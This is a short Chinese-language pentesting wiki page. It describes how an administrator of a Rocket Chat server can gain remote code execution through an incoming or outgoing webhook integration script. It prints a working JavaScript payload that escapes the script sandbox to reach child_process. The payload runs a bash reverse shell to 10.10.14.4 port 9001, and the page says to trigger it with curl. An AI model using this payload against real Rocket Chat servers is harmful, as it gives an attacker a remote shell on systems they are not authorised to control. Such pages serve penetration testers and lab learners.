Rocket Chat

RCE
如果您是Rocket Chat内部管理员,您可以获得RCE。
转到**
Integrations
,选择New Integration
,并选择任何一个:Incoming WebHook
或Outgoing WebHook
**。/admin/integrations/incoming

根据文档,两者都使用ES2015 / ECMAScript 6(基本上是JavaScript)来处理数据。因此,让我们为JavaScript获取一个用于反向shell的rev shell:
const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
配置 WebHook(频道和帖子的用户名必须存在):

配置 WebHook 脚本:

保存更改
获取生成的 WebHook URL:

使用 curl 调用它,您应该收到反向 shell

最后更新于